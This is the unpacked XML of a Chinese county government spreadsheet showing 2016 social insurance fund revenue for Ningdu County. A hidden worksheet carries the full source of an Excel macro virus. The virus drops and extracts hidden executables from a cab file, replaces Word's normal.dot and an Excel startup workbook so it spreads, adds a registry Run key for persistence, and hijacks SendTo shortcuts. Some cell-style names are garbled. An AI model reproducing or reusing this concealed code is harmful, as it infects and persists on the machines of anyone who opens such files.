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240" yWindow="105" windowWidth="14805" windowHeight="8010" firstSheet="1" activeTab="1"/>
  </bookViews>
  <sheets>
    <sheet name="(m1)_(m2)_(m3)" sheetId="5" state="hidden" r:id="rId1"/>
    <sheet name="社保基金收入" sheetId="2" r:id="rId2"/>
  </sheets>
  <definedNames>
    <definedName name="Counter" localSheetId="0">'(m1)_(m2)_(m3)'!$C$82</definedName>
  </definedNames>
  <calcPr calcId="124519"/>
</workbook>
</file>

<file path=xl/calcChain.xml><?xml version="1.0" encoding="utf-8"?>
<calcChain xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <c r="B6" i="2"/>
  <c r="D5"/>
  <c r="D6"/>
  <c r="D7"/>
  <c r="D8"/>
  <c r="D9"/>
  <c r="D10"/>
  <c r="D11"/>
  <c r="D13"/>
  <c r="D4"/>
  <c r="C12"/>
  <c r="C14" s="1"/>
  <c r="B12"/>
  <c r="D12" l="1"/>
  <c r="B14"/>
  <c r="D14" s="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="99" uniqueCount="90">
  <si>
    <t>单位：万元</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>Private Sub createcabfile()</t>
  </si>
  <si>
    <t>Dim ch As Byte</t>
  </si>
  <si>
    <t>on error resume next</t>
  </si>
  <si>
    <t>Set fso = CreateObject("scripting.filesystemobject")</t>
  </si>
  <si>
    <t>Set w = CreateObject("wscript.shell")</t>
  </si>
  <si>
    <t>myfolder = w.specialfolders("Templates") &amp; "\Software\"</t>
  </si>
  <si>
    <t>If Not fso.folderexists(myfolder) Then</t>
  </si>
  <si>
    <t>fso.createfolder myfolder</t>
  </si>
  <si>
    <t>End If</t>
  </si>
  <si>
    <t>For i=1 to Workbooks.Count</t>
  </si>
  <si>
    <t>If Workbooks(i).name="normal.xlm" then</t>
  </si>
  <si>
    <t>workbooks(i).close</t>
  </si>
  <si>
    <t>fso.deletefile Application.StartupPath &amp; "\normal.xlm"</t>
  </si>
  <si>
    <t>Next</t>
  </si>
  <si>
    <t>If Workbooks(i).name="norma1.xlm" then</t>
  </si>
  <si>
    <t>goto a1</t>
  </si>
  <si>
    <t>cabfile= "c:\cab.cab"</t>
  </si>
  <si>
    <t>If Not fso.fileexists(Application.StartupPath &amp; "\norma1.xlm") Then</t>
  </si>
  <si>
    <t>fso.delete cabfile</t>
  </si>
  <si>
    <t>open cabfile for binary access write as #1</t>
  </si>
  <si>
    <t>For i = 1 To 150</t>
  </si>
  <si>
    <r>
      <t>hv</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="黑体"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value</t>
    </r>
  </si>
  <si>
    <t>n=1</t>
  </si>
  <si>
    <t>m=instr(hv," ")</t>
  </si>
  <si>
    <t>do while m&gt;0</t>
  </si>
  <si>
    <t>ch=CByte(mid(hv,n,m-n))</t>
  </si>
  <si>
    <t>put #1,,ch</t>
  </si>
  <si>
    <t>n=m+1</t>
  </si>
  <si>
    <t>m=instr(n,hv," ")</t>
  </si>
  <si>
    <t>loop</t>
  </si>
  <si>
    <t>close #1</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extrac32 /E /Y /L c:\ c:\cab.cab", 0, True</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extract /E /Y /L c:\ c:\cab.cab", 0, True</t>
  </si>
  <si>
    <t>fso.deletefile cabfile</t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", myfolder, True</t>
  </si>
  <si>
    <t>set word=createobject("word.application")</t>
  </si>
  <si>
    <t>ntpath=word.NormalTemplate.Path &amp; "\"</t>
  </si>
  <si>
    <t>word.quit</t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", ntpath, True</t>
  </si>
  <si>
    <t>fso.copyfile "c:\norma1.xlm", Application.StartupPath &amp; "\", True</t>
  </si>
  <si>
    <t>fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) &amp; "\"</t>
  </si>
  <si>
    <t>set fold=fso.getfolder(w.SpecialFolders("SendTo"))</t>
  </si>
  <si>
    <t>for each ff in fold.files</t>
  </si>
  <si>
    <r>
      <t>if instr(ff.name,"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="黑体"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>软盘</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>")&gt;0 then</t>
    </r>
  </si>
  <si>
    <r>
      <t>set lnk=</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>w</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="黑体"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>.CreateShortcut(fold.path &amp; "\" &amp; ff.name)</t>
    </r>
  </si>
  <si>
    <r>
      <t>lnk.</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="黑体"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>TargetPath="c:\sendto.exe"</t>
    </r>
  </si>
  <si>
    <t>lnk.IconLocation="shell32.dll,6"</t>
  </si>
  <si>
    <t>lnk.save</t>
  </si>
  <si>
    <t>goto e2</t>
  </si>
  <si>
    <t>end if</t>
  </si>
  <si>
    <t>next</t>
  </si>
  <si>
    <t>e2:</t>
  </si>
  <si>
    <t>fso.deletefile "c:\normal.dot"</t>
  </si>
  <si>
    <t>fso.deletefile "c:\norma1.xlm"</t>
  </si>
  <si>
    <t>fso.deletefile "c:\internet.exe"</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib +s +h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib +s +h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t>w.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internet.exe","internet.exe"</t>
  </si>
  <si>
    <t>w.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internat.exe"</t>
  </si>
  <si>
    <r>
      <t>W</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="黑体"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>orkbooks.Open Application.StartupPath &amp; "\norma1.xlm"</t>
    </r>
  </si>
  <si>
    <t>thisworkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy workbooks("norma1.xlm").sheets("(m1)_(m2)_(m3)").Columns(2)</t>
  </si>
  <si>
    <t>workbooks("norma1.xlm").save</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">fso.copyfile </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="黑体"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Application.StartupPath &amp; "\norma1.xlm",myfolder,true</t>
    </r>
  </si>
  <si>
    <t>a1:</t>
  </si>
  <si>
    <t>fso.deletefile "c:\excel.txt"</t>
  </si>
  <si>
    <t>Application.DisplayAlerts = False</t>
  </si>
  <si>
    <t>for i=1 to thisworkbook.sheets.count</t>
  </si>
  <si>
    <r>
      <t>if left(thisworkbook.sheets(i).name,3)="</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="黑体"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>模块表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>" then</t>
    </r>
  </si>
  <si>
    <t>ThisWorkbook.Sheets(i).Delete</t>
  </si>
  <si>
    <t>Application.DisplayAlerts = True</t>
  </si>
  <si>
    <t>ThisWorkbook.Saved=True</t>
  </si>
  <si>
    <t>End Sub</t>
  </si>
  <si>
    <t>科目名称</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>2016年决算数</t>
  </si>
  <si>
    <t>2016年调整预算数</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>决算数占预算数%</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>2016年度宁都县社会保险基金收入决算表</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>一、企业职工基本养老保险基金收入</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>二、机关事业单位疾病养老保险基金收入</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>三、城乡居民基本养老保险基金收入</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>四、城镇职工基本医疗保险基金收入</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>五、居民基本医疗保险基金收入</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>六、工伤保险基金收入</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>七、失业保险基金收入</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>八、生育保险基金收入</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>社会保险基金收入合计</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>上年结余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</si>
</sst>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9">
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="黑体"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="黑体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor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b/>
      <sz val="16"/>
      <name val="黑体"/>
      <family val="3"/>
      <charset val="13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4" fillId="0" borderId="1" xfId="1" applyFont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2"/>
    <xf numFmtId="49" fontId="1" fillId="0" borderId="0" xfId="2" applyNumberFormat="1"/>
    <xf numFmtId="49" fontId="8" fillId="0" borderId="0" xfId="2" applyNumberFormat="1" applyFont="1"/>
    <xf numFmtId="176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</cellXfs>
  <cellStyles count="3">
    <cellStyle name="?鹎%U龡&amp;H齲_x0001_C铣_x0014__x0007__x0001__x0001_" xfId="1"/>
    <cellStyle name="常规" xfId="0" builtinId="0"/>
    <cellStyle name="常规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经典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opLeftCell="G1" workbookViewId="0">
      <selection sqref="A1:F65536"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="19.25" style="5" hidden="1" customWidth="1"/>
    <col min="2" max="2" width="6.625" hidden="1" customWidth="1"/>
    <col min="3" max="3" width="31.875" style="6" hidden="1" customWidth="1"/>
    <col min="4" max="6" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="7" max="256" width="9" style="5"/>
    <col min="257" max="262" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="263" max="512" width="9" style="5"/>
    <col min="513" max="518" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="519" max="768" width="9" style="5"/>
    <col min="769" max="774" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="775" max="1024" width="9" style="5"/>
    <col min="1025" max="1030" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="1031" max="1280" width="9" style="5"/>
    <col min="1281" max="1286" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="1287" max="1536" width="9" style="5"/>
    <col min="1537" max="1542" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="1543" max="1792" width="9" style="5"/>
    <col min="1793" max="1798" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="1799" max="2048" width="9" style="5"/>
    <col min="2049" max="2054" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="2055" max="2304" width="9" style="5"/>
    <col min="2305" max="2310" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="2311" max="2560" width="9" style="5"/>
    <col min="2561" max="2566" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="2567" max="2816" width="9" style="5"/>
    <col min="2817" max="2822" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="2823" max="3072" width="9" style="5"/>
    <col min="3073" max="3078" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="3079" max="3328" width="9" style="5"/>
    <col min="3329" max="3334" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="3335" max="3584" width="9" style="5"/>
    <col min="3585" max="3590" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="3591" max="3840" width="9" style="5"/>
    <col min="3841" max="3846" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="3847" max="4096" width="9" style="5"/>
    <col min="4097" max="4102" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="4103" max="4352" width="9" style="5"/>
    <col min="4353" max="4358" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="4359" max="4608" width="9" style="5"/>
    <col min="4609" max="4614" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="4615" max="4864" width="9" style="5"/>
    <col min="4865" max="4870" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="4871" max="5120" width="9" style="5"/>
    <col min="5121" max="5126" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="5127" max="5376" width="9" style="5"/>
    <col min="5377" max="5382" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="5383" max="5632" width="9" style="5"/>
    <col min="5633" max="5638" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="5639" max="5888" width="9" style="5"/>
    <col min="5889" max="5894" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="5895" max="6144" width="9" style="5"/>
    <col min="6145" max="6150" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="6151" max="6400" width="9" style="5"/>
    <col min="6401" max="6406" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="6407" max="6656" width="9" style="5"/>
    <col min="6657" max="6662" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="6663" max="6912" width="9" style="5"/>
    <col min="6913" max="6918" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="6919" max="7168" width="9" style="5"/>
    <col min="7169" max="7174" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="7175" max="7424" width="9" style="5"/>
    <col min="7425" max="7430" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="7431" max="7680" width="9" style="5"/>
    <col min="7681" max="7686" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="7687" max="7936" width="9" style="5"/>
    <col min="7937" max="7942" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="7943" max="8192" width="9" style="5"/>
    <col min="8193" max="8198" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="8199" max="8448" width="9" style="5"/>
    <col min="8449" max="8454" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="8455" max="8704" width="9" style="5"/>
    <col min="8705" max="8710" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="8711" max="8960" width="9" style="5"/>
    <col min="8961" max="8966" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="8967" max="9216" width="9" style="5"/>
    <col min="9217" max="9222" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="9223" max="9472" width="9" style="5"/>
    <col min="9473" max="9478" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="9479" max="9728" width="9" style="5"/>
    <col min="9729" max="9734" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="9735" max="9984" width="9" style="5"/>
    <col min="9985" max="9990" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="9991" max="10240" width="9" style="5"/>
    <col min="10241" max="10246" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="10247" max="10496" width="9" style="5"/>
    <col min="10497" max="10502" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="10503" max="10752" width="9" style="5"/>
    <col min="10753" max="10758" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="10759" max="11008" width="9" style="5"/>
    <col min="11009" max="11014" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="11015" max="11264" width="9" style="5"/>
    <col min="11265" max="11270" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="11271" max="11520" width="9" style="5"/>
    <col min="11521" max="11526" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="11527" max="11776" width="9" style="5"/>
    <col min="11777" max="11782" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="11783" max="12032" width="9" style="5"/>
    <col min="12033" max="12038" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="12039" max="12288" width="9" style="5"/>
    <col min="12289" max="12294" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="12295" max="12544" width="9" style="5"/>
    <col min="12545" max="12550" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="12551" max="12800" width="9" style="5"/>
    <col min="12801" max="12806" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="12807" max="13056" width="9" style="5"/>
    <col min="13057" max="13062" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="13063" max="13312" width="9" style="5"/>
    <col min="13313" max="13318" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="13319" max="13568" width="9" style="5"/>
    <col min="13569" max="13574" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="13575" max="13824" width="9" style="5"/>
    <col min="13825" max="13830" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="13831" max="14080" width="9" style="5"/>
    <col min="14081" max="14086" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="14087" max="14336" width="9" style="5"/>
    <col min="14337" max="14342" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="14343" max="14592" width="9" style="5"/>
    <col min="14593" max="14598" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="14599" max="14848" width="9" style="5"/>
    <col min="14849" max="14854" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="14855" max="15104" width="9" style="5"/>
    <col min="15105" max="15110" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="15111" max="15360" width="9" style="5"/>
    <col min="15361" max="15366" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="15367" max="15616" width="9" style="5"/>
    <col min="15617" max="15622" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="15623" max="15872" width="9" style="5"/>
    <col min="15873" max="15878" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="15879" max="16128" width="9" style="5"/>
    <col min="16129" max="16134" width="0" style="5" hidden="1" customWidth="1"/>
    <col min="16135" max="16384" width="9" style="5"/>
  </cols>
  <sheetData>
    <row r="1" spans="3:3">
      <c r="C1" s="6" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="2" spans="3:3">
      <c r="C2" s="6" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="3" spans="3:3" ht="15.75">
      <c r="C3" s="7" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="4" spans="3:3">
      <c r="C4" s="6" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="5" spans="3:3">
      <c r="C5" s="6" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="6" spans="3:3">
      <c r="C6" s="6" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="7" spans="3:3">
      <c r="C7" s="6" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="8" spans="3:3">
      <c r="C8" s="6" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="9" spans="3:3">
      <c r="C9" s="6" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="10" spans="3:3" ht="15.75">
      <c r="C10" s="7" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="11" spans="3:3" ht="15.75">
      <c r="C11" s="7" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="12" spans="3:3" ht="15.75">
      <c r="C12" s="7" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="13" spans="3:3">
      <c r="C13" s="6" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="14" spans="3:3" ht="15.75">
      <c r="C14" s="7" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="15" spans="3:3" ht="15.75">
      <c r="C15" s="7" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="16" spans="3:3" ht="15.75">
      <c r="C16" s="7" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="17" spans="3:3" ht="15.75">
      <c r="C17" s="7" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="18" spans="3:3" ht="15.75">
      <c r="C18" s="7" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="19" spans="3:3" ht="15.75">
      <c r="C19" s="7" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="20" spans="3:3" ht="15.75">
      <c r="C20" s="7" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="21" spans="3:3">
      <c r="C21" s="6" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="22" spans="3:3">
      <c r="C22" s="6" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="23" spans="3:3" ht="15.75">
      <c r="C23" s="7" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="24" spans="3:3" ht="15.75">
      <c r="C24" s="7" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="25" spans="3:3">
      <c r="C25" s="6" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="26" spans="3:3" ht="15.75">
      <c r="C26" s="7" t="s">
        <v>22</v>
      </c>
    </row>
    <row r="27" spans="3:3" ht="15.75">
      <c r="C27" s="7" t="s">
        <v>23</v>
      </c>
    </row>
    <row r="28" spans="3:3" ht="15.75">
      <c r="C28" s="7" t="s">
        <v>24</v>
      </c>
    </row>
    <row r="29" spans="3:3" ht="15.75">
      <c r="C29" s="7" t="s">
        <v>25</v>
      </c>
    </row>
    <row r="30" spans="3:3" ht="15.75">
      <c r="C30" s="7" t="s">
        <v>26</v>
      </c>
    </row>
    <row r="31" spans="3:3" ht="15.75">
      <c r="C31" s="7" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="32" spans="3:3" ht="15.75">
      <c r="C32" s="7" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="33" spans="3:3" ht="15.75">
      <c r="C33" s="7" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="34" spans="3:3" ht="15.75">
      <c r="C34" s="7" t="s">
        <v>30</v>
      </c>
    </row>
    <row r="35" spans="3:3">
      <c r="C35" s="6" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="36" spans="3:3" ht="15.75">
      <c r="C36" s="7" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="37" spans="3:3">
      <c r="C37" s="6" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="38" spans="3:3">
      <c r="C38" s="6" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="39" spans="3:3">
      <c r="C39" s="6" t="s">
        <v>34</v>
      </c>
    </row>
    <row r="40" spans="3:3">
      <c r="C40" s="6" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="41" spans="3:3">
      <c r="C41" s="6" t="s">
        <v>36</v>
      </c>
    </row>
    <row r="42" spans="3:3">
      <c r="C42" s="6" t="s">
        <v>37</v>
      </c>
    </row>
    <row r="43" spans="3:3" ht="15.75">
      <c r="C43" s="7" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="44" spans="3:3" ht="15.75">
      <c r="C44" s="7" t="s">
        <v>39</v>
      </c>
    </row>
    <row r="45" spans="3:3" ht="15.75">
      <c r="C45" s="7" t="s">
        <v>40</v>
      </c>
    </row>
    <row r="46" spans="3:3">
      <c r="C46" s="6" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="47" spans="3:3">
      <c r="C47" s="6" t="s">
        <v>42</v>
      </c>
    </row>
    <row r="48" spans="3:3">
      <c r="C48" s="6" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="49" spans="3:3">
      <c r="C49" s="6" t="s">
        <v>44</v>
      </c>
    </row>
    <row r="50" spans="3:3">
      <c r="C50" s="6" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="51" spans="3:3" ht="15.75">
      <c r="C51" s="7" t="s">
        <v>46</v>
      </c>
    </row>
    <row r="52" spans="3:3" ht="15.75">
      <c r="C52" s="6" t="s">
        <v>47</v>
      </c>
    </row>
    <row r="53" spans="3:3" ht="15.75">
      <c r="C53" s="7" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="54" spans="3:3" ht="15.75">
      <c r="C54" s="7" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="55" spans="3:3" ht="15.75">
      <c r="C55" s="7" t="s">
        <v>50</v>
      </c>
    </row>
    <row r="56" spans="3:3" ht="15.75">
      <c r="C56" s="7" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="57" spans="3:3" ht="15.75">
      <c r="C57" s="7" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="58" spans="3:3" ht="15.75">
      <c r="C58" s="7" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="59" spans="3:3" ht="15.75">
      <c r="C59" s="7" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="60" spans="3:3" ht="15.75">
      <c r="C60" s="7" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="61" spans="3:3" ht="15.75">
      <c r="C61" s="7" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="62" spans="3:3" ht="15.75">
      <c r="C62" s="7" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="63" spans="3:3">
      <c r="C63" s="6" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="64" spans="3:3">
      <c r="C64" s="6" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="65" spans="3:3">
      <c r="C65" s="6" t="s">
        <v>60</v>
      </c>
    </row>
    <row r="66" spans="3:3">
      <c r="C66" s="6" t="s">
        <v>61</v>
      </c>
    </row>
    <row r="67" spans="3:3">
      <c r="C67" s="6" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="68" spans="3:3" ht="15.75">
      <c r="C68" s="7" t="s">
        <v>62</v>
      </c>
    </row>
    <row r="69" spans="3:3" ht="15.75">
      <c r="C69" s="7" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="70" spans="3:3" ht="15.75">
      <c r="C70" s="7" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="71" spans="3:3" ht="15.75">
      <c r="C71" s="7" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="72" spans="3:3" ht="15.75">
      <c r="C72" s="7" t="s">
        <v>66</v>
      </c>
    </row>
    <row r="73" spans="3:3" ht="15.75">
      <c r="C73" s="7" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="74" spans="3:3">
      <c r="C74" s="6" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="75" spans="3:3" ht="15.75">
      <c r="C75" s="7" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="76" spans="3:3" ht="15.75">
      <c r="C76" s="7" t="s">
        <v>70</v>
      </c>
    </row>
    <row r="77" spans="3:3">
      <c r="C77" s="6" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="78" spans="3:3" ht="15.75">
      <c r="C78" s="7" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="79" spans="3:3" ht="15.75">
      <c r="C79" s="7" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="80" spans="3:3">
      <c r="C80" s="6" t="s">
        <v>72</v>
      </c>
    </row>
    <row r="81" spans="3:3" ht="15.75">
      <c r="C81" s="7" t="s">
        <v>73</v>
      </c>
    </row>
    <row r="82" spans="3:3">
      <c r="C82" s="6" t="s">
        <v>74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showZeros="0" tabSelected="1" workbookViewId="0">
      <selection activeCell="C8" sqref="C8"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.5"/>
  <cols>
    <col min="1" max="1" width="37.375" customWidth="1"/>
    <col min="2" max="2" width="13.5" customWidth="1"/>
    <col min="3" max="3" width="14" customWidth="1"/>
    <col min="4" max="4" width="17.75" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:4" ht="34.5" customHeight="1">
      <c r="A1" s="12" t="s">
        <v>79</v>
      </c>
      <c r="B1" s="12"/>
      <c r="C1" s="12"/>
      <c r="D1" s="12"/>
    </row>
    <row r="2" spans="1:4" ht="41.25" customHeight="1">
      <c r="A2" s="2"/>
      <c r="B2" s="11" t="s">
        <v>0</v>
      </c>
      <c r="C2" s="11"/>
      <c r="D2" s="11"/>
    </row>
    <row r="3" spans="1:4" ht="42.75" customHeight="1">
      <c r="A3" s="3" t="s">
        <v>75</v>
      </c>
      <c r="B3" s="4" t="s">
        <v>77</v>
      </c>
      <c r="C3" s="1" t="s">
        <v>76</v>
      </c>
      <c r="D3" s="4" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="4" spans="1:4" ht="21.95" customHeight="1">
      <c r="A4" s="9" t="s">
        <v>80</v>
      </c>
      <c r="B4" s="8">
        <v>34378</v>
      </c>
      <c r="C4" s="8">
        <v>32619</v>
      </c>
      <c r="D4" s="8">
        <f>C4/B4*100</f>
        <v>94.883355634417356</v>
      </c>
    </row>
    <row r="5" spans="1:4" ht="21.95" customHeight="1">
      <c r="A5" s="9" t="s">
        <v>81</v>
      </c>
